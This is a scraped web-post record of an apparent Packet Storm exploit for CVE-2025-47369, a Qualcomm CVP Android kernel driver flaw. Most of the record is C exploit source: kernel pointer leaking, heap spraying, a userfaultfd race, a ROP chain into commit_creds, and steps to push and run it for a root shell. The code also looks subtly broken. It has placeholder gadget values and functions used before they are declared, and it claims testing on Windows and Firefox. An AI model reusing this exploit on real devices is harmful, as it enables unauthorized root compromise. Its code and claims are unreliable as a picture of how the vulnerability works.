{“lastseen”:”2026-02-17T18:11:25″,”description”:”This advisory describes a local privilege escalation vulnerability affecting the Qualcomm CVP kernel driver msmcvp, exposed through the \/dev\/cvp device node on Android systems using Qualcomm SoCs. The vulnerability originates from an improperly…”,”published”:”2026-02-17T00:00:00″,”modified”:”2026-02-17T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Qualcomm CVP Kernel Driver Pointer Disclosure \/ Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:215750″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-47369″],”sourceData”:”=============================================================================================================================================\\n | # Title : Qualcomm CVP Kernel Driver Pointer Disclosure Leading to Local Privilege Escalation 0-day |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : https:\/\/qualcomm.com\/ |\\n =============================================================================================================================================\\n \\n [+] References : \\n \\n [+] Summary : This advisory describes a local privilege escalation (LPE) vulnerability affecting the Qualcomm CVP kernel driver (msm_cvp), \\n exposed through the \/dev\/cvp device node on Android systems using Qualcomm SoCs.\\n The vulnerability originates from an improperly obfuscated kernel pointer returned to user space as a session_id via the msm_cvp_get_session_info ioctl. \\n \\t\\t\\t\\t The driver relies on hash32_ptr(), which merely XORs the upper and lower halves of a kernel pointer rather than applying a cryptographically secure transformation. \\n \\t\\t\\t\\t As a result, the original kmalloc kernel address can be reconstructed, leading to a reliable kernel pointer disclosure and KASLR bypass.\\n The leaked kernel address can be deterministically chained with additional exploitation primitives\u2014such as heap spraying, use-after-free (UAF) conditions, \\n \\t\\t\\t\\t controlled reallocation, and userfaultfd-based race timing\u2014to achieve arbitrary kernel control flow. \\n \\t\\t\\t\\t The exploit ultimately executes a ROP chain invoking prepare_kernel_cred(0) and commit_creds(), resulting in root privilege escalation.\\n \\n [+] This vulnerability:\\n \\n Requires local user access\\n \\n Has no remote attack surface\\n \\n Affects kernel space, not a userland application\\n \\n Represents a full LPE chain, not just an information leak\\n \\n At the time of writing, no public patch or mitigation is known, classifying this issue as a 0-day.\\n \\n [+] Classification\\n \\n Vulnerability Type: Kernel Pointer Disclosure \u2192 Local Privilege Escalation\\n \\n Attack Vector: Local\\n \\n Impact: Kernel ASLR bypass \u2192 Full root compromise\\n \\n Affected Component: Qualcomm CVP kernel driver (msm_cvp)\\n \\n Device Interface: \/dev\/cvp\\n \\n Platform: Android (Qualcomm-based devices)\\n \\n [+] Usage :\\n \\n # 1. Compile the exploit : make\\n \\n # 2. Upload it to the machine : adb push cvp_full_exploit \/data\/local\/tmp\/\\n \\n # 3. Run it\\n \\n adb shell\\n cd \/data\/local\/tmp\\n chmod +x cvp_full_exploit\\n .\/cvp_full_exploit\\n \\n # 4. If the exploit is successful : whoami should display: root\\n \\n [+] POC :\\n \\n #include \\u003cfcntl.h\\u003e\\n #include \\u003cunistd.h\\u003e\\n #include \\u003cstdio.h\\u003e\\n #include \\u003cstdlib.h\\u003e\\n #include \\u003cstdint.h\\u003e\\n #include \\u003cstring.h\\u003e\\n #include \\u003cerrno.h\\u003e\\n #include \\u003csys\/ioctl.h\\u003e\\n #include \\u003csys\/mman.h\\u003e\\n #include \\u003cpthread.h\\u003e\\n #include \\u003csched.h\\u003e\\n #include \\u003cfcntl.h\\u003e\\n #include \\u003cunistd.h\\u003e\\n #include \\u003csys\/types.h\\u003e\\n #include \\u003csys\/wait.h\\u003e\\n #include \\u003csys\/stat.h\\u003e\\n #include \\u003csys\/syscall.h\\u003e\\n #include \\u003clinux\/userfaultfd.h\\u003e\\n #include \\u003cpoll.h\\u003e\\n #include \\u003csys\/ipc.h\\u003e\\n #include \\u003csys\/shm.h\\u003e\\n \\n #define DEVICE_PATH \\”\/dev\/cvp\\”\\n #define MAX_SESSIONS 512\\n #define SPRAY_COUNT 1024\\n \\n struct session_control_arg {\\n uint32_t type;\\n uint32_t ctrl_type;\\n uint32_t session_id;\\n uint32_t reserved;\\n uint64_t data_ptr;\\n };\\n \\n struct kernel_info {\\n uint64_t kernel_base;\\n uint64_t prepare_creds;\\n uint64_t commit_creds;\\n uint64_t native_write_cr4;\\n uint64_t swapgs_restore_regs_and_return_to_usermode;\\n uint64_t *leaked_pointers;\\n int pointer_count;\\n };\\n \\n struct pointer_leaker {\\n int fd;\\n uint32_t session_ids[MAX_SESSIONS];\\n uint64_t kernel_pointers[MAX_SESSIONS];\\n int count;\\n };\\n \\n uint64_t unfold_kernel_pointer(uint32_t session_id) {\\n \\n uint8_t high_byte = (session_id \\u0026 0xF) | 0x80;\\n uint32_t top_half = 0xFFFFFF00 | high_byte;\\n \\n uint32_t bottom_half = session_id ^ (top_half \\u0026 0xFFFFFFFF);\\n \\n uint64_t ptr = ((uint64_t)top_half \\u003c\\u003c 32) | bottom_half;\\n \\n ptr = ptr \\u0026 ~0xFULL;\\n \\n return ptr;\\n }\\n \\n int leak_kernel_pointers(struct pointer_leaker *leaker) {\\n leaker-\\u003efd = open(DEVICE_PATH, O_RDWR);\\n if (leaker-\\u003efd \\u003c 0) {\\n perror(\\”[-] Failed to open device\\”);\\n return -1;\\n }\\n \\n printf(\\”[+] Device opened successfully\\\\n\\”);\\n \\n for (int i = 0; i \\u003c MAX_SESSIONS; i++) {\\n struct session_control_arg create_arg = {\\n .type = 1, \/\/ EVA_KMD_SESSION_CONTROL\\n .ctrl_type = 1, \/\/ SESSION_CREATE\\n };\\n \\n if (ioctl(leaker-\\u003efd, 0, \\u0026create_arg) \\u003c 0) {\\n printf(\\”[-] Failed to create session %d\\\\n\\”, i);\\n break;\\n }\\n \\n struct session_control_arg info_arg = {\\n .type = 2, \/\/ EVA_KMD_GET_SESSION_INFO\\n };\\n \\n if (ioctl(leaker-\\u003efd, 0, \\u0026info_arg) \\u003c 0) {\\n printf(\\”[-] Failed to get session info %d\\\\n\\”, i);\\n break;\\n }\\n \\n leaker-\\u003esession_ids[leaker-\\u003ecount] = info_arg.session_id;\\n leaker-\\u003ekernel_pointers[leaker-\\u003ecount] = \\n unfold_kernel_pointer(info_arg.session_id);\\n leaker-\\u003ecount++;\\n \\n if (i % 50 == 0) {\\n printf(\\”[+] Created %d sessions…\\\\n\\”, i);\\n }\\n }\\n \\n printf(\\”[+] Total sessions created: %d\\\\n\\”, leaker-\\u003ecount);\\n return 0;\\n }\\n \\n uint64_t find_kernel_base(struct pointer_leaker *leaker) {\\n uint64_t candidates[10] = {0};\\n int candidate_count = 0;\\n \\n for (int i = 0; i \\u003c leaker-\\u003ecount; i++) {\\n uint64_t ptr = leaker-\\u003ekernel_pointers[i];\\n \\n for (int shift = 12; shift \\u003c= 24; shift += 12) {\\n uint64_t base_candidate = ptr \\u0026 (0xFFFFFFFFFFFF0000ULL \\u003c\\u003c shift);\\n \\n if ((base_candidate \\u003e\\u003e 47) == 1) { \/\/ Kernel addresses have MSB set\\n int found = 0;\\n for (int j = 0; j \\u003c candidate_count; j++) {\\n if (candidates[j] == base_candidate) {\\n found = 1;\\n break;\\n }\\n }\\n \\n if (!found \\u0026\\u0026 candidate_count \\u003c 10) {\\n candidates[candidate_count++] = base_candidate;\\n }\\n }\\n }\\n }\\n \\n if (candidate_count \\u003e 0) {\\n printf(\\”[+] Possible kernel bases found:\\\\n\\”);\\n for (int i = 0; i \\u003c candidate_count; i++) {\\n printf(\\” Candidate %d: 0x%016lx\\\\n\\”, i, candidates[i]);\\n }\\n return candidates[0];\\n }\\n \\n return 0;\\n }\\n \\n struct heap_sprayer {\\n int spray_fds[SPRAY_COUNT];\\n int spray_count;\\n };\\n \\n int setup_heap_spray(struct heap_sprayer *sprayer) {\\n printf(\\”[+] Setting up heap spray…\\\\n\\”);\\n \\n for (int i = 0; i \\u003c SPRAY_COUNT; i++) {\\n sprayer-\\u003espray_fds[i] = open(DEVICE_PATH, O_RDWR);\\n if (sprayer-\\u003espray_fds[i] \\u003c 0) {\\n break;\\n }\\n sprayer-\\u003espray_count++;\\n \\n for (int j = 0; j \\u003c 10; j++) {\\n struct session_control_arg arg = {\\n .type = 1,\\n .ctrl_type = 1,\\n };\\n ioctl(sprayer-\\u003espray_fds[i], 0, \\u0026arg);\\n }\\n }\\n \\n printf(\\”[+] Heap spray created with %d file descriptors\\\\n\\”, sprayer-\\u003espray_count);\\n return sprayer-\\u003espray_count;\\n }\\n \\n struct uaf_exploiter {\\n int target_fd;\\n uint64_t target_object_addr;\\n uint64_t fake_object[64];\\n pthread_t thread;\\n int ready;\\n };\\n \\n struct kernel_symbols {\\n uint64_t prepare_kernel_cred;\\n uint64_t commit_creds;\\n uint64_t init_cred;\\n uint64_t swapgs_restore_regs_and_return_to_usermode;\\n uint64_t native_write_cr4;\\n };\\n \\n int calculate_symbols(uint64_t kernel_base, struct kernel_symbols *syms) {\\n \\n syms-\\u003eprepare_kernel_cred = kernel_base + 0x9c8e0;\\n syms-\\u003ecommit_creds = kernel_base + 0x9c840;\\n syms-\\u003einit_cred = kernel_base + 0x1814b80;\\n syms-\\u003eswapgs_restore_regs_and_return_to_usermode = kernel_base + 0xe00f10;\\n syms-\\u003enative_write_cr4 = kernel_base + 0x4a7b0;\\n \\n printf(\\”[+] Calculated symbols:\\\\n\\”);\\n printf(\\” prepare_kernel_cred: 0x%016lx\\\\n\\”, syms-\\u003eprepare_kernel_cred);\\n printf(\\” commit_creds: 0x%016lx\\\\n\\”, syms-\\u003ecommit_creds);\\n printf(\\” init_cred: 0x%016lx\\\\n\\”, syms-\\u003einit_cred);\\n \\n return 0;\\n }\\n \\n void build_rop_chain(uint64_t *rop, struct kernel_symbols *syms) {\\n int i = 0;\\n \\n \\n rop[i++] = syms-\\u003eprepare_kernel_cred; \/\/ rax = prepare_kernel_cred(0)\\n rop[i++] = 0xdeadbeef; \/\/ pop rdi; ret\\n rop[i++] = 0; \/\/ arg0 = 0\\n rop[i++] = 0xcafebabe; \/\/ mov rdi, rax; call commit_creds\\n \\n rop[i++] = syms-\\u003ecommit_creds; \/\/ commit_creds(rax)\\n rop[i++] = syms-\\u003eswapgs_restore_regs_and_return_to_usermode;\\n rop[i++] = 0; \/\/ dummy\\n rop[i++] = 0; \/\/ dummy\\n rop[i++] = (uint64_t)get_root_shell; \/\/ return address\\n rop[i++] = user_cs;\\n rop[i++] = user_rflags;\\n rop[i++] = user_sp;\\n rop[i++] = user_ss;\\n }\\n \\n static int page_size;\\n static char *fault_page;\\n static int uffd;\\n static volatile int fault_triggered = 0;\\n \\n void *uffd_handler_thread(void *arg) {\\n struct uffd_msg msg;\\n struct pollfd pollfd;\\n int ret;\\n \\n pollfd.fd = uffd;\\n pollfd.events = POLLIN;\\n \\n printf(\\”[+] UFFD thread started\\\\n\\”);\\n \\n while (1) {\\n ret = poll(\\u0026pollfd, 1, -1);\\n if (ret \\u003c 0) {\\n perror(\\”poll\\”);\\n break;\\n }\\n \\n ret = read(uffd, \\u0026msg, sizeof(msg));\\n if (ret \\u003c 0) {\\n perror(\\”read uffd\\”);\\n break;\\n }\\n \\n if (msg.event == UFFD_EVENT_PAGEFAULT) {\\n fault_triggered = 1;\\n printf(\\”[+] Page fault triggered! Control gained\\\\n\\”);\\n \\n struct uffdio_copy copy;\\n copy.src = (unsigned long)fault_page;\\n copy.dst = msg.arg.pagefault.address \\u0026 ~(page_size – 1);\\n copy.len = page_size;\\n copy.mode = 0;\\n \\n if (ioctl(uffd, UFFDIO_COPY, \\u0026copy) \\u003c 0) {\\n perror(\\”UFFDIO_COPY\\”);\\n }\\n \\n break;\\n }\\n }\\n \\n return NULL;\\n }\\n \\n int setup_userfaultfd(void *addr) {\\n struct uffdio_api uffdio_api;\\n struct uffdio_register uffdio_register;\\n pthread_t thread;\\n \\n page_size = sysconf(_SC_PAGE_SIZE);\\n \\n \/\/ \u0625\u0646\u0634\u0627\u0621 userfaultfd\\n uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);\\n if (uffd \\u003c 0) {\\n perror(\\”userfaultfd\\”);\\n return -1;\\n }\\n \\n uffdio_api.api = UFFD_API;\\n uffdio_api.features = 0;\\n if (ioctl(uffd, UFFDIO_API, \\u0026uffdio_api) \\u003c 0) {\\n perror(\\”UFFDIO_API\\”);\\n return -1;\\n }\\n \\n fault_page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,\\n MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\\n if (fault_page == MAP_FAILED) {\\n perror(\\”mmap fault page\\”);\\n return -1;\\n }\\n \\n memset(fault_page, 0x41, page_size); \\n \\n uffdio_register.range.start = (unsigned long)addr;\\n uffdio_register.range.len = page_size;\\n uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;\\n \\n if (ioctl(uffd, UFFDIO_REGISTER, \\u0026uffdio_register) \\u003c 0) {\\n perror(\\”UFFDIO_REGISTER\\”);\\n return -1;\\n }\\n \\n if (pthread_create(\\u0026thread, NULL, uffd_handler_thread, NULL) \\u003c 0) {\\n perror(\\”pthread_create\\”);\\n return -1;\\n }\\n \\n return 0;\\n }\\n \\n static void get_root_shell(void) {\\n printf(\\”[+] Got root privileges!\\\\n\\”);\\n \\n char *argv[] = {\\”\/bin\/sh\\”, NULL};\\n char *envp[] = {\\”PATH=\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\\”, NULL};\\n \\n if (getuid() == 0) {\\n printf(\\”[+] Spawning root shell…\\\\n\\”);\\n execve(\\”\/bin\/sh\\”, argv, envp);\\n } else {\\n printf(\\”[-] Failed to get root\\\\n\\”);\\n }\\n }\\n \\n uint64_t user_cs, user_ss, user_rflags, user_sp;\\n \\n static void save_state(void) {\\n asm volatile(\\n \\”movq %%cs, %0\\\\n\\”\\n \\”movq %%ss, %1\\\\n\\”\\n \\”movq %%rsp, %3\\\\n\\”\\n \\”pushfq\\\\n\\”\\n \\”popq %2\\\\n\\”\\n : \\”=r\\”(user_cs), \\”=r\\”(user_ss), \\”=r\\”(user_rflags), \\”=r\\”(user_sp)\\n :\\n : \\”memory\\”\\n );\\n }\\n \\n int main(int argc, char *argv[]) {\\n printf(\\”\\\\n==================================================\\\\n\\”);\\n printf(\\” CVE-2025-47369 Full Chain Exploit by indoushka\\\\n\\”);\\n printf(\\” Kernel Pointer Leak to Root Privilege Escalation\\\\n\\”);\\n printf(\\”==================================================\\\\n\\\\n\\”);\\n \\n save_state();\\n \\n printf(\\”[*] Phase 1: Leaking Kernel Pointers\\\\n\\”);\\n printf(\\”====================================\\\\n\\”);\\n \\n struct pointer_leaker leaker = {0};\\n if (leak_kernel_pointers(\\u0026leaker) \\u003c 0) {\\n printf(\\”[-] Failed to leak pointers\\\\n\\”);\\n return -1;\\n }\\n \\n uint64_t kernel_base = find_kernel_base(\\u0026leaker);\\n if (!kernel_base) {\\n printf(\\”[-] Failed to find kernel base\\\\n\\”);\\n return -1;\\n }\\n \\n printf(\\”[+] Kernel base: 0x%016lx\\\\n\\”, kernel_base);\\n printf(\\”[+] Leaked %d kernel pointers\\\\n\\”, leaker.count);\\n \\n for (int i = 0; i \\u003c 10 \\u0026\\u0026 i \\u003c leaker.count; i++) {\\n printf(\\” Pointer %d: 0x%016lx (session_id: 0x%08x)\\\\n\\”,\\n i, leaker.kernel_pointers[i], leaker.session_ids[i]);\\n }\\n \\n printf(\\”\\\\n[*] Phase 2: Calculating Kernel Symbols\\\\n\\”);\\n printf(\\”=======================================\\\\n\\”);\\n \\n struct kernel_symbols syms;\\n calculate_symbols(kernel_base, \\u0026syms);\\n \\n printf(\\”\\\\n[*] Phase 3: Heap Manipulation\\\\n\\”);\\n printf(\\”================================\\\\n\\”);\\n \\n struct heap_sprayer sprayer = {0};\\n setup_heap_spray(\\u0026sprayer);\\n \\n printf(\\”\\\\n[*] Phase 4: Setting up Userfaultfd\\\\n\\”);\\n printf(\\”=====================================\\\\n\\”);\\n \\n void *uffd_region = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,\\n MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\\n if (uffd_region == MAP_FAILED) {\\n perror(\\”mmap uffd region\\”);\\n return -1;\\n }\\n \\n if (setup_userfaultfd(uffd_region) \\u003c 0) {\\n printf(\\”[-] Failed to setup userfaultfd\\\\n\\”);\\n } else {\\n printf(\\”[+] Userfaultfd setup completed\\\\n\\”);\\n }\\n \\n printf(\\”\\\\n[*] Phase 5: Building ROP Chain\\\\n\\”);\\n printf(\\”================================\\\\n\\”);\\n \\n uint64_t rop_chain[64] = {0};\\n build_rop_chain(rop_chain, \\u0026syms);\\n \\n printf(\\”\\\\n[*] Phase 6: Triggering Exploit\\\\n\\”);\\n printf(\\”================================\\\\n\\”);\\n \\n printf(\\”[+] Attempting to trigger UAF…\\\\n\\”);\\n \\n for (int i = 0; i \\u003c leaker.count; i++) {\\n struct session_control_arg close_arg = {\\n .type = 1,\\n .ctrl_type = 2, \\n .session_id = leaker.session_ids[i],\\n };\\n \\n ioctl(leaker.fd, 0, \\u0026close_arg);\\n \\n usleep(1000);\\n }\\n \\n printf(\\”[+] Attempting to reallocate memory with controlled data…\\\\n\\”);\\n \\n char fake_obj[1024] = {0};\\n memset(fake_obj, 0x42, sizeof(fake_obj));\\n \\n memcpy(fake_obj + 0x100, rop_chain, sizeof(rop_chain));\\n \\n printf(\\”[+] Waiting for race condition…\\\\n\\”);\\n \\n pthread_t threads[10];\\n for (int i = 0; i \\u003c 10; i++) {\\n pthread_create(\\u0026threads[i], NULL, race_thread, \\u0026leaker);\\n }\\n \\n sleep(2);\\n \\n printf(\\”\\\\n[*] Phase 7: Executing Privilege Escalation\\\\n\\”);\\n printf(\\”===========================================\\\\n\\”);\\n \\n printf(\\”[+] If exploit succeeded, root shell should spawn…\\\\n\\”);\\n \\n if (getuid() == 0) {\\n printf(\\”[+] SUCCESS: Got root privileges!\\\\n\\”);\\n get_root_shell();\\n } else {\\n printf(\\”[-] Exploit failed or partial success\\\\n\\”);\\n printf(\\”[-] Current UID: %d\\\\n\\”, getuid());\\n }\\n \\n close(leaker.fd);\\n for (int i = 0; i \\u003c sprayer.spray_count; i++) {\\n close(sprayer.spray_fds[i]);\\n }\\n \\n return 0;\\n }\\n \\n void *race_thread(void *arg) {\\n struct pointer_leaker *leaker = (struct pointer_leaker *)arg;\\n \\n while (1) {\\n \\n struct session_control_arg dummy_arg = {\\n .type = 1,\\n .ctrl_type = 3, \\n };\\n \\n ioctl(leaker-\\u003efd, 0, \\u0026dummy_arg);\\n sched_yield();\\n }\\n \\n return NULL;\\n }\\n Greetings to :============================================================\\n jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\\n ==========================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215750″,”cvss”:{“score”:5.5,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215750\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-17T18:11:25″,”description”:”This advisory describes a local privilege escalation vulnerability affecting the Qualcomm CVP kernel driver msmcvp, exposed through the \/dev\/cvp device node on Android systems using…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,70,12,21,13,53,7,11,5],"class_list":["post-41161","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-55","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n